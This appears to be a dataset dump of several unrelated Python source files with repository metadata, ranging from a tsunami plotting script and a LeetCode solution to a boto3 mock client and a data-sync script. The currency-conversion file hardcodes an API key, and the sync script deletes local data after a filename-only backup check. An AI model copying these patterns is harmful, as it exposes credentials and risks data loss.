h = np.array([[float(x) for x in line[1:]] for line in data])
x = np.arange(1, h.shape[1]+1)
time_steps = [0, 25, 50, 75]
fig = plt.figure(figsize=(8, 10))
axes = [plt.subplot2grid((4, 1), (row, 0), colspan=1, rowspan=1)
for row in range(4)]
for ax in axes:
n = axes.index(ax)
ax.plot(x, h[time_steps[n], :], 'b-')
ax.fill_between(x, 0, h[time_steps[n], :], color='b', alpha=0.4)
ax.grid()
ax.set_xlim(1, 100)
ax.set_ylim(0, 1)
ax.set_ylabel('Height', fontsize=16)
ax.set_xticks([25, 50, 75, 100])
ax.set_yticks([0, 0.25, 0.5, 0.75, 1])
for ax in axes:
n = axes.index(ax)
ax.set_title('Time step ' + '%3i' % time_steps[n])
for ax in axes[:-1]:
ax.set_xticklabels([])
axes[3].set_xlabel('', fontsize=16)
axes[-1].set_xlabel('Spatial grid index')
plt.savefig('water_height_ch02.svg')
plt.close(fig)
| 25.967213 | 103 | 0.667298 | """
plot_water_height_multipanel.py
Reads output of tsunami and plots the results in an image file.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='text file output by the tsunami simulator (chapter 2 version)')
args = parser.parse_args()
input_file = args.input_file
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from sys import platform
if platform == 'win32':
unicodeVar = 'utf-16'
else:
unicodeVar = 'utf-8'
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 16})
# read data into a list
data = [line.rstrip().split() for line in open(input_file, encoding = unicodeVar).readlines()]
time = [float(line[0]) for line in data]
h = np.array([[float(x) for x in line[1:]] for line in data])
x = np.arange(1, h.shape[1]+1)
time_steps = [0, 25, 50, 75]
fig = plt.figure(figsize=(8, 10))
axes = [plt.subplot2grid((4, 1), (row, 0), colspan=1, rowspan=1)
for row in range(4)]
for ax in axes:
n = axes.index(ax)
ax.plot(x, h[time_steps[n], :], 'b-')
ax.fill_between(x, 0, h[time_steps[n], :], color='b', alpha=0.4)
ax.grid()
ax.set_xlim(1, 100)
ax.set_ylim(0, 1)
ax.set_ylabel('Height', fontsize=16)
ax.set_xticks([25, 50, 75, 100])
ax.set_yticks([0, 0.25, 0.5, 0.75, 1])
for ax in axes:
n = axes.index(ax)
ax.set_title('Time step ' + '%3i' % time_steps[n])
for ax in axes[:-1]:
ax.set_xticklabels([])
axes[3].set_xlabel('', fontsize=16)
axes[-1].set_xlabel('Spatial grid index')
plt.savefig('water_height_ch02.svg')
plt.close(fig)
| 0 | 0 | 0 |
7397c45fd6ce87f11502a2835e27ad1692511b42 | 1,751 | py | Python | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | 2 | 2022-02-16T22:24:14.000Z | 2022-02-24T16:59:42.000Z | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | null | null | null | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | null | null | null | # Backspace String Compare
""" Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
"""
| 24.661972 | 138 | 0.467733 | # Backspace String Compare
""" Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
"""
class Solution:
    def backspaceCompare(self, s: str, t: str) -> bool:
        """Return True if s and t render to the same text when '#' acts as
        a backspace.  Scans both strings from the end in O(1) extra space."""

        def settle(text: str, idx: int) -> int:
            # Walk left past '#' markers and the characters they delete;
            # return the index of the next surviving character, or -1.
            pending = 0
            while idx >= 0:
                if text[idx] == '#':
                    pending += 1
                elif pending:
                    pending -= 1
                else:
                    break
                idx -= 1
            return idx

        i, j = len(s) - 1, len(t) - 1
        while i >= 0 or j >= 0:
            i = settle(s, i)
            j = settle(t, j)
            if i < 0 and j < 0:
                return True          # both exhausted simultaneously
            if i < 0 or j < 0:
                return False         # one string ran out first
            if s[i] != t[j]:
                return False         # surviving characters differ
            i -= 1
            j -= 1
        return True
| 1,058 | -6 | 49 |
27ad12942b6502b5ad80e3d82eafd85656556fd1 | 632 | py | Python | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | 1 | 2020-04-25T13:27:05.000Z | 2020-04-25T13:27:05.000Z | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | 2 | 2017-04-28T18:31:12.000Z | 2017-04-28T19:23:48.000Z | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | null | null | null |
import sys
from time import sleep
from cement.ext.ext_argparse import ArgparseController, expose as ex
| 24.307692 | 68 | 0.672468 |
import sys
from time import sleep
from cement.ext.ext_argparse import ArgparseController, expose as ex
class BaseController(ArgparseController):
    """Top-level cement controller; prints help when no sub-command is given."""
    class Meta:
        label = 'base'
        description = 'Jenkins Pipeline Automation'
        # Invoked when the user supplies no sub-command.
        default_func = '_default'

    @ex(hide=True)
    def _default(self):
        """Warn that a sub-command is required and show usage."""
        self.app.log.warning('Sub-Command required!')
        self.app.args.print_help()
class PipelineController(ArgparseController):
    """Controller for pipeline sub-commands (label set by subclasses/config)."""
    class Meta:
        # label is intentionally None here; see Meta.help for the role.
        label = None
        help = 'pipeline sub-controller'

    def __init__(self, *args, **kw):
        # Plain pass-through to ArgparseController; no extra setup.
        super(PipelineController, self).__init__(*args, **kw)
| 160 | 320 | 46 |
501996cb5578902068a7dde08a1ee813c501b3a5 | 921 | py | Python | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | import requests
URL_API = r"https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE"
API_KEY = "FJOSXYTTSW4VUT7H"
| 27.088235 | 79 | 0.661238 | import requests
URL_API = r"https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE"
API_KEY = "FJOSXYTTSW4VUT7H"
class Dollar:
def __init__(self, value):
self._value = value
def __add__(self, dollar_add):
return Dollar(self._value + dollar_add.value)
@property
def value(self):
return self._value
def __eq__(self, compare):
return self._value == compare.value
def convert_to_pound(self):
url_request = (
f"{URL_API}" f"&from_currency=USD&to_currency=GBP&apikey={API_KEY}"
)
response = requests.get(url_request)
data_exchange = response.json()
exchange_rate = data_exchange["Realtime Currency Exchange Rate"]
exchange_rate = float(exchange_rate["5. Exchange Rate"])
return Dollar(self.value * exchange_rate)
def __repr__(self):
return f"Dollar(value={self._value})"
| 605 | 167 | 23 |
70cf10f92c92a45bd7efc7454c1bd861a6c5caf3 | 3,525 | py | Python | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 13 | 2019-05-01T01:37:30.000Z | 2022-03-18T08:52:19.000Z | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 111 | 2019-03-25T00:50:48.000Z | 2022-03-30T17:13:43.000Z | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 52 | 2019-01-24T21:05:04.000Z | 2022-03-07T23:37:55.000Z | #!/usr/bin/env python3
import os
import glob
import json
from datetime import datetime
import subprocess as sp
from pprint import pprint
from pygama.utils import *
def main():
    """
    sync MJ60 data with cenpa-rocks.
    - rsync the entire Data/MJ60 directory using the $DATADIR variable
    - set flags to then remove raw/raw_to_dsp/tier2 files
    Hopefully we can reuse this script for C1.
    """
    global runDB
    with open("runDB.json") as f:
        runDB = json.load(f)

    # NOTE(review): the rsync step is currently disabled; daq_cleanup()
    # presumably relies on a prior sync - confirm before deleting files.
    # run_rsync()
    daq_cleanup()
def run_rsync(test=False):
    """
    run rsync on the entire $DATADIR/MJ60 folder (can take a while ...)
    Setting ``test=True`` adds --dry-run so nothing is actually transferred.
    """
    # Refuse to run anywhere but the MJ60 DAQ account.
    if "mjcenpa" not in os.environ["USER"]:
        print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
        exit()
    src = os.path.expandvars(runDB["loc_dir"] + "/")
    dst = "{}:{}/".format(runDB["rocks_login"], runDB["rocks_dir"])
    template = "rsync -avh --dry-run {} {}" if test else "rsync -avh {} {}"
    sh(template.format(src, dst))
def daq_cleanup(keep_t1=False, keep_t2=False):
    """
    build a list of files on the DAQ and rocks, check integrity,
    and delete files on the DAQ only if we're sure the transfer was successful.
    MJ60 and C1 ORCA raw files have "BackgroundRun" in the filenames
    keep_t1 / keep_t2 : bool
        When True, pygama tier-1 / tier-2 files are kept on the DAQ machine.
    """
    # Safety interlock: deletion must only ever happen on the MJ60 DAQ account.
    if "mjcenpa" not in os.environ["USER"]:
        print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
        exit()
    # local (DAQ) list
    datadir_loc = os.path.expandvars(runDB["loc_dir"] + "/")
    filelist_loc = glob.glob(datadir_loc + "/**", recursive=True)
    # for f in filelist_loc:
    # print(f)
    # remote list: `ls -R` over ssh; directory headers contain ":" and empty
    # lines separate directories, so both are filtered out below.
    args = ['ssh', runDB['rocks_login'], 'ls -R '+runDB["rocks_dir"]]
    ls = sp.Popen(args, stdout=sp.PIPE, stderr=sp.PIPE)
    out, err = ls.communicate()
    out = out.decode('utf-8')
    filelist_rocks = out.split("\n")
    filelist_rocks = [f for f in filelist_rocks if ":" not in f and len(f)!=0]
    # for f in filelist_rocks:
    # print(f)
    # make sure all files have successfully transferred
    # NOTE(review): comparison is by bare filename only — no checksum/size check.
    for f in filelist_loc:
        fname = f.split("/")[-1]
        if len(fname) == 0:
            continue
        if fname not in filelist_rocks:
            print("whoa, ", fname, "not found in remote list!")
            exit()
    print("All files in:\n {}\nhave been backed up to cenpa-rocks."
          .format(datadir_loc))
    print("It should be OK to delete local files.")
    # don't delete these files, orca needs them
    ignore_list = [".Orca", "RunNumber"]
    # set these bools to not remove the pygama files
    if keep_t1:
        ignore_list.append("t1_run")
    if keep_t2:
        ignore_list.append("t2_run")
    # now delete old files, ask for Y/N confirmation
    print("OK to delete local files? [y/n]")
    if input() in ["y","Y"]:
        for f in filelist_loc:
            # NOTE(review): str.replace returns a new string and the result is
            # discarded, so this line is a no-op — paths containing spaces are
            # not actually escaped here.
            f.replace(" ", "\ ")
            if os.path.isfile(f):
                if any(ig in f for ig in ignore_list):
                    continue
                print("Deleting:", f)
                os.remove(f)
        now = datetime.now()
        print("Processing is up to date!", now.strftime("%Y-%m-%d %H:%M"))
def download_rocks():
    """
    Placeholder: should eventually recall raw files from cenpa-rocks for
    reprocessing (for now all processing happens on the DAQ computer).
    Currently only prints a greeting.
    """
    print("hi clint")
if __name__=="__main__":
main()
| 29.621849 | 79 | 0.601135 | #!/usr/bin/env python3
import os
import glob
import json
from datetime import datetime
import subprocess as sp
from pprint import pprint
from pygama.utils import *
def main():
    """
    sync MJ60 data with cenpa-rocks.
    - rsync the entire Data/MJ60 directory using the $DATADIR variable
    - set flags to then remove raw/raw_to_dsp/tier2 files
    Hopefully we can reuse this script for C1.
    """
    global runDB
    # Load the run database once into a module-level global; run_rsync and
    # daq_cleanup both read paths/credentials from it.
    with open("runDB.json") as f:
        runDB = json.load(f)
    # run_rsync()  # transfer step currently disabled; only cleanup runs
    daq_cleanup()
def run_rsync(test=False):
    """
    run rsync on the entire $DATADIR/MJ60 folder (can take a while ...)
    test : bool
        When True, rsync runs with --dry-run and transfers nothing.
    """
    # Only run from the MJ60 DAQ account — paths and credentials assume it.
    if "mjcenpa" not in os.environ["USER"]:
        print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
        exit()
    #raw_dir = runDB["loc_dir"] + "/"
    raw_dir = os.path.expandvars(runDB["loc_dir"] + "/")
    # Remote target in rsync's host:path form.
    raw_rocks = "{}:{}/".format(runDB["rocks_login"], runDB["rocks_dir"])
    if test:
        cmd = "rsync -avh --dry-run {} {}".format(raw_dir, raw_rocks)
    else:
        cmd = "rsync -avh {} {}".format(raw_dir, raw_rocks)
    sh(cmd)
def daq_cleanup(keep_t1=False, keep_t2=False):
    """
    build a list of files on the DAQ and rocks, check integrity,
    and delete files on the DAQ only if we're sure the transfer was successful.
    MJ60 and C1 ORCA raw files have "BackgroundRun" in the filenames
    keep_t1 / keep_t2 : bool
        When True, pygama tier-1 / tier-2 files are kept on the DAQ machine.
    """
    # Safety interlock: deletion must only ever happen on the MJ60 DAQ account.
    if "mjcenpa" not in os.environ["USER"]:
        print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
        exit()
    # local (DAQ) list
    datadir_loc = os.path.expandvars(runDB["loc_dir"] + "/")
    filelist_loc = glob.glob(datadir_loc + "/**", recursive=True)
    # for f in filelist_loc:
    # print(f)
    # remote list: `ls -R` over ssh; directory headers contain ":" and empty
    # lines separate directories, so both are filtered out below.
    args = ['ssh', runDB['rocks_login'], 'ls -R '+runDB["rocks_dir"]]
    ls = sp.Popen(args, stdout=sp.PIPE, stderr=sp.PIPE)
    out, err = ls.communicate()
    out = out.decode('utf-8')
    filelist_rocks = out.split("\n")
    filelist_rocks = [f for f in filelist_rocks if ":" not in f and len(f)!=0]
    # for f in filelist_rocks:
    # print(f)
    # make sure all files have successfully transferred
    # NOTE(review): comparison is by bare filename only — no checksum/size check.
    for f in filelist_loc:
        fname = f.split("/")[-1]
        if len(fname) == 0:
            continue
        if fname not in filelist_rocks:
            print("whoa, ", fname, "not found in remote list!")
            exit()
    print("All files in:\n {}\nhave been backed up to cenpa-rocks."
          .format(datadir_loc))
    print("It should be OK to delete local files.")
    # don't delete these files, orca needs them
    ignore_list = [".Orca", "RunNumber"]
    # set these bools to not remove the pygama files
    if keep_t1:
        ignore_list.append("t1_run")
    if keep_t2:
        ignore_list.append("t2_run")
    # now delete old files, ask for Y/N confirmation
    print("OK to delete local files? [y/n]")
    if input() in ["y","Y"]:
        for f in filelist_loc:
            # NOTE(review): str.replace returns a new string and the result is
            # discarded, so this line is a no-op — paths containing spaces are
            # not actually escaped here.
            f.replace(" ", "\ ")
            if os.path.isfile(f):
                if any(ig in f for ig in ignore_list):
                    continue
                print("Deleting:", f)
                os.remove(f)
        now = datetime.now()
        print("Processing is up to date!", now.strftime("%Y-%m-%d %H:%M"))
def download_rocks():
    """
    TODO: recall the raw files from cenpa-rocks for reprocessing
    (since for now all processing happens on the DAQ computer).
    Currently a placeholder that only prints a greeting.
    """
    print("hi clint")
if __name__=="__main__":
main()
| 0 | 0 | 0 |
61df2b933869a21dbcd5ef0a8ddbcdd052aeb71c | 453 | py | Python | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | VHDTools/PyVinil/setup.py | maerd-zinbieL/x86 | 88a5ba9894a5f1319dd3aff13696ecf73803c765 | [
"MIT"
] | null | null | null | from distutils.core import setup
# Package metadata for PyVinil — Python bindings over the Vinil C library for
# creating, reading, and writing VHD virtual hard disks.
# NOTE(review): distutils is deprecated (removed in Python 3.12) — consider
# migrating this to setuptools.
setup(
    name='PyVinil',
    version='0.1.0',
    author='Igor Bonadio',
    author_email='igorbonadio@gmail.com',
    packages=['pyvinil', 'pyvinil.test'],
    url='https://github.com/igorbonadio/pyvinil',
    license='LICENSE.txt',
    description='PyVinil is a Python library, which uses Vinil (a C library), for creating, reading and writing virtual hard disks.',
    long_description=open('README.txt').read(),
) | 34.846154 | 133 | 0.693157 | from distutils.core import setup
# Package metadata for PyVinil — Python bindings over the Vinil C library for
# creating, reading, and writing VHD virtual hard disks.
# NOTE(review): distutils is deprecated (removed in Python 3.12) — consider
# migrating this to setuptools.
setup(
    name='PyVinil',
    version='0.1.0',
    author='Igor Bonadio',
    author_email='igorbonadio@gmail.com',
    packages=['pyvinil', 'pyvinil.test'],
    url='https://github.com/igorbonadio/pyvinil',
    license='LICENSE.txt',
    description='PyVinil is a Python library, which uses Vinil (a C library), for creating, reading and writing virtual hard disks.',
    long_description=open('README.txt').read(),
) | 0 | 0 | 0 |
db5922ac640569bd2ff71faaaf243e178ad47431 | 8,641 | py | Python | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | null | null | null | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | 3 | 2021-08-10T01:01:59.000Z | 2021-08-10T02:39:37.000Z | boto3_mock/mock_client.py | yutaka-kabu/pandas-redshift | 1e5f808d110ca82b77b28a383695743622e14d27 | [
"BSD-3-Clause"
] | 1 | 2021-09-24T02:19:57.000Z | 2021-09-24T02:19:57.000Z | import copy
import jsonschema
from jsonschema import ValidationError
from datetime import datetime
from dateutil.tz import tzlocal
from botocore import xform_name
from botocore.model import ServiceModel
from botocore.serialize import create_serializer
import botocore.session
botocore_session = botocore.session.get_session()
botocore_loader = botocore_session.get_component("data_loader")
| 33.10728 | 78 | 0.594607 | import copy
import jsonschema
from jsonschema import ValidationError
from datetime import datetime
from dateutil.tz import tzlocal
from botocore import xform_name
from botocore.model import ServiceModel
from botocore.serialize import create_serializer
import botocore.session
botocore_session = botocore.session.get_session()
botocore_loader = botocore_session.get_component("data_loader")
def load_service_description(service_name):
    """Return the raw 'service-2' JSON model for *service_name* from botocore's data loader."""
    return botocore_loader.load_service_model(
        service_name, "service-2", api_version=None
    )
class MockClient(object):
    """
    Mock stand-in for a boto3/botocore service client.
    One instance is cached per AWS service (see ``get_instance``). For every
    operation in the service's botocore model, a ``snake_case`` method is
    attached to the class. Each generated method serializes its keyword
    arguments against the real botocore operation model, invokes a
    user-supplied mock callable (registered via ``set_mock``), validates the
    mock's response against a JSON Schema derived from the service model, and
    converts timestamp strings back into ``datetime`` objects the way a real
    client would.
    """
    # Per-service singleton cache keyed by service name (see get_instance).
    __instances = {}
    # To deal with datetime objects in boto3 response with string
    _TIMESTAMP_PATTERN = (
        "^(Mon|Tue|Wed|Thu|Fri|Sat|Sun), "
        "[0-9]{2} (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) [0-9]{4}"
        " [0-9]{2}:[0-9]{2}:[0-9]{2}\\.[0-9]{6}$"
    )
    # Marker placed in a schema's "description" so _convert_response can
    # recognize which string fields represent timestamps.
    _TIMESTAMP_DESCRIPTION = "timestamp"
    # Maps botocore shape types to JSON Schema types.
    _TYPE_MAP = {
        "blob": "string",
        "boolean": "boolean",
        "double": "number",
        "float": "number",
        "integer": "integer",
        "list": "array",
        "long": "integer",
        "string": "string",
        "structure": "object",
        "timestamp": "string",
    }
    # Schema for the ResponseMetadata entry that botocore adds to every
    # parsed response; attached to each operation's output schema.
    _RESPONSE_METADATA_SCHEMA = {
        "type": "object",
        "required": [
            "RequestId",
            "HTTPStatusCode",
            "HTTPHeaders",
            "RetryAttempts",
        ],
        "properties": {
            "RequestId": {"type": "string"},
            "HTTPStatusCode": {"type": "integer"},
            "HTTPHeaders": {
                "type": "object",
                "additionalProperties": {"type": "string"},
            },
            "RetryAttempts": {"type": "integer"},
        },
        "additionalProperties": True,
    }
    def _add_response_metadata_schema(self, operation_name, schema):
        """Attach the ResponseMetadata sub-schema to an operation's output schema (in place)."""
        schema_properties = schema["properties"]
        schema_properties["ResponseMetadata"] = self._RESPONSE_METADATA_SCHEMA
    def _shape_to_schema(self, shape, shapes):
        """Recursively translate the botocore shape named *shape* into a JSON Schema dict."""
        shape_info = shapes[shape]
        shape_type = shape_info["type"]
        schema = {"type": MockClient._TYPE_MAP[shape_type]}
        if shape_type == "list":
            # Lists: recurse into the single member shape.
            member = shape_info["member"]
            member_shape = member["shape"]
            if "min" in shape_info:
                schema["minItems"] = shape_info["min"]
            if "max" in shape_info:
                schema["maxItems"] = shape_info["max"]
            schema["items"] = self._shape_to_schema(member_shape, shapes)
            return schema
        if shape_type == "structure":
            # Structures: recurse into every member; unknown keys rejected.
            if "required" in shape_info:
                schema["required"] = shape_info["required"]
            properties = schema.setdefault("properties", {})
            for member_name, member_info in shape_info["members"].items():
                member_shape = member_info["shape"]
                properties[member_name] = self._shape_to_schema(
                    member_shape, shapes
                )
            if "additionalProperties" not in schema:
                schema["additionalProperties"] = False
            return schema
        # Scalar shapes: carry over enum/min/max/pattern constraints.
        if "enum" in shape_info:
            schema["enum"] = shape_info["enum"]
        if "min" in shape_info:
            # For strings min/max constrain the length, otherwise the value.
            if shape_type == "string":
                schema["minLength"] = shape_info["min"]
            else:
                schema["minimum"] = shape_info["min"]
        if "max" in shape_info:
            if shape_type == "string":
                schema["maxLength"] = shape_info["max"]
            else:
                schema["maximum"] = shape_info["max"]
        if "pattern" in shape_info:
            schema["pattern"] = shape_info["pattern"]
        if shape_type == "timestamp":
            # Timestamps are strings constrained to _TIMESTAMP_PATTERN and
            # tagged so _convert_response can turn them back into datetimes.
            schema["pattern"] = self._TIMESTAMP_PATTERN
            schema["description"] = self._TIMESTAMP_DESCRIPTION
        return schema
    def _extract_schema(self, operation_name, shape, shapes):
        """Build the JSON Schema for one operation's output shape."""
        schema = self._shape_to_schema(shape, shapes)
        return schema
    def _extract_schemas(self, service_description):
        """Build {operation name: output JSON Schema} for every operation that declares an output."""
        schemas = {}
        operations = service_description["operations"]
        shapes = service_description["shapes"]
        for operation_name, operation_info in operations.items():
            # Operations without an "output" member return nothing to validate.
            if "output" not in operation_info:
                continue
            output_info = operation_info["output"]
            schemas[operation_name] = self._extract_schema(
                operation_name, output_info["shape"], shapes
            )
            self._add_response_metadata_schema(
                operation_name, schemas[operation_name]
            )
        return schemas
    @classmethod
    def get_instance(cls, service_name):
        """Return the cached MockClient for *service_name*, creating (and wiring methods for) it on first use."""
        if service_name not in cls.__instances:
            cls._add_methods(service_name)
            # Bypass __new__ (which is blocked) and run the private initializer.
            cls.__instances[service_name] = cls.__private_init__(
                super(MockClient, cls).__new__(cls), service_name
            )
        return cls.__instances[service_name]
    def __new__(cls, *args, **kwargs):
        # Direct construction is forbidden — use get_instance() instead.
        raise NotImplementedError("Cannot initialize via Constructor")
    @classmethod
    def __private_init__(cls, self, service_name):
        """Initialize a freshly allocated instance: load the model and derive response schemas."""
        self.service_name = service_name
        service_description = load_service_description(service_name)
        # Deep-copy so schema derivation never mutates botocore's cached model.
        service_description_copy = copy.deepcopy(service_description)
        self.schemas = self._extract_schemas(service_description_copy)
        # operation name -> user-registered mock callable
        self._mocks = {}
        return self
    def validate_response(self, operation_name, response_dict):
        """Validate *response_dict* against the operation's derived schema (raises ValidationError)."""
        response_schema = self.schemas[operation_name]
        jsonschema.validate(response_dict, response_schema)
    def set_mock(self, operation_name, mock):
        """Register *mock* as the callable backing *operation_name* (PascalCase model name)."""
        self._mocks[operation_name] = mock
    @classmethod
    def _add_methods(cls, service_name):
        """Attach one snake_case API method to the class per operation in the service model."""
        service_description = load_service_description(service_name)
        service_model = ServiceModel(
            service_description, service_name=service_name
        )
        operations = service_description["operations"]
        for operation_key, operation_info in operations.items():
            operation_name = operation_info["name"]
            method = cls._create_method(operation_name, service_model)
            setattr(cls, method.__name__, method)
    def _convert_response(self, response, schema):
        """Walk *response* guided by *schema*, replacing tagged timestamp strings with aware datetimes (mutates containers in place)."""
        response_type = schema["type"]
        if response_type == "object":
            properties = schema.get("properties", {})
            for key, item_schema in properties.items():
                if key not in response:
                    continue
                response[key] = self._convert_response(
                    response[key], item_schema
                )
            return response
        if response_type == "array":
            item_schema = schema["items"]
            for index in range(len(response)):
                response[index] = self._convert_response(
                    response[index], item_schema
                )
            return response
        if response_type == "string":
            # Only strings tagged by _shape_to_schema are parsed as timestamps.
            if schema.get("description", "") == self._TIMESTAMP_DESCRIPTION:
                dt = datetime.strptime(response, "%a, %d %b %Y %H:%M:%S.%f")
                # Parsed value is naive; attach the local timezone.
                dt = dt.replace(tzinfo=tzlocal())
                return dt
        return response
    @classmethod
    def _create_method(cls, operation_name, service_model):
        """Build the mock API method (closure) for *operation_name*."""
        method_name = xform_name(operation_name)
        operation_model = service_model.operation_model(operation_name)
        protocol = service_model.metadata["protocol"]
        serializer = create_serializer(protocol)
        def _make_api_call_mock(self, *args, **kwargs):
            # Mirror boto3's contract: API parameters are keyword-only.
            if args:
                raise TypeError(
                    "{}() only accepts keyword arguments.".format(method_name)
                )
            api_params = kwargs
            # Serialize against the real model so invalid parameters fail
            # exactly as they would with a live client.
            serializer.serialize_to_request(api_params, operation_model)
            mock = self._mocks.get(operation_name)
            if not mock:
                raise NotImplementedError(
                    "The mock for {}() has not been set.".format(method_name)
                )
            try:
                response_dict = mock(*args, **kwargs)
                self.validate_response(operation_name, response_dict)
                schema = self.schemas[operation_name]
                return self._convert_response(response_dict, schema)
            # NOTE(review): bare re-raise is a no-op kept for explicitness.
            except ValidationError:
                raise
        _make_api_call_mock.__name__ = str(method_name)
        return _make_api_call_mock
| 6,592 | 1,606 | 46 |
cf09709decd334b101b925de361fe7d9fdd3b7a0 | 1,240 | py | Python | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | null | null | null | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | 7 | 2020-02-11T23:00:50.000Z | 2021-12-13T19:41:39.000Z | bbdev/utils.py | ekivemark/BlueButtonDev | c751a5c52a83df6b97ef2c653a4492d959610c42 | [
"Apache-2.0"
] | 2 | 2018-10-06T21:46:22.000Z | 2020-10-10T16:10:42.000Z | """
bluebuttondev.bbdev
FILE: utils
Created: 6/16/15 12:11 AM
Basic conversion tools
"""
__author__ = 'Mark Scrimshire:@ekivemark'
def email_mask(email=""):
    """
    mask and potentially shorten an email address
    Useful for communications
    Keeps the first two characters of the local part, domain, and TLD,
    replacing the rest of each segment with "**".
    :param email: address to mask; assumed to contain a single "@"
    :return: masked string such as "jo**@e**.c**", or None for empty input
    """
    if email == "":
        return None
    domain = "@" + email.split("@")[1]
    # Fix: the original indexed split(".")[1], which picks the wrong segment
    # for multi-label domains (e.g. "mail.example.com"); take the last
    # dot-separated component so the true TLD is masked.
    tld = "." + domain.rsplit(".", 1)[1]
    # Fix: removed `if settings.DEBUG: print(...)` — `settings` was never
    # imported in this module, so every call raised NameError.
    result_email = email[:2] + "**" + domain[:2] + "**" + tld[:2] + "**"
    return result_email
bluebuttondev.bbdev
FILE: utils
Created: 6/16/15 12:11 AM
Basic conversion tools
"""
__author__ = 'Mark Scrimshire:@ekivemark'
def str2int(inp):
    """Convert a numeric string (or number) to an int."""
    return int(inp)
def str2bool(inp):
    """Return True only for the case-insensitive string "TRUE"; everything else is False."""
    return inp.upper() == "TRUE"
def email_domain(email, at=False):
    # get email domain from an email field.
    domain = email.split('@')[1].rstrip()
    # Preserve the exact `== False` test: any other value of `at`
    # (including None) selects the "@"-prefixed form.
    if at == False:
        return domain
    return "@" + domain
def email_name(email, at=False):
    # get email username from an email field.
    name = email.split('@')[0].rstrip()
    # Preserve the exact `== False` test from the original implementation.
    if at == False:
        return name
    return name + "@"
def email_mask(email=""):
    """
    mask and potentially shorten an email address
    Useful for communications
    Keeps the first two characters of the local part, domain, and TLD,
    replacing the rest of each segment with "**".
    :param email: address to mask; assumed to contain a single "@"
    :return: masked string such as "jo**@e**.c**", or None for empty input
    """
    if email == "":
        return None
    domain = "@" + email.split("@")[1]
    # Fix: the original indexed split(".")[1], which picks the wrong segment
    # for multi-label domains (e.g. "mail.example.com"); take the last
    # dot-separated component so the true TLD is masked.
    tld = "." + domain.rsplit(".", 1)[1]
    # Fix: removed `if settings.DEBUG: print(...)` — `settings` was never
    # imported in this module, so every call raised NameError.
    result_email = email[:2] + "**" + domain[:2] + "**" + tld[:2] + "**"
    return result_email
9c243c1755c8320c9607913fee3e4483abf4735a | 2,026 | py | Python | testsuite/tests/apicast/policy/caching/test_caching_policy_allow.py | dlaso99/3scale-tests | b31a3b3596af6d632b393e383c0417ea56bd95ca | [
"Apache-2.0"
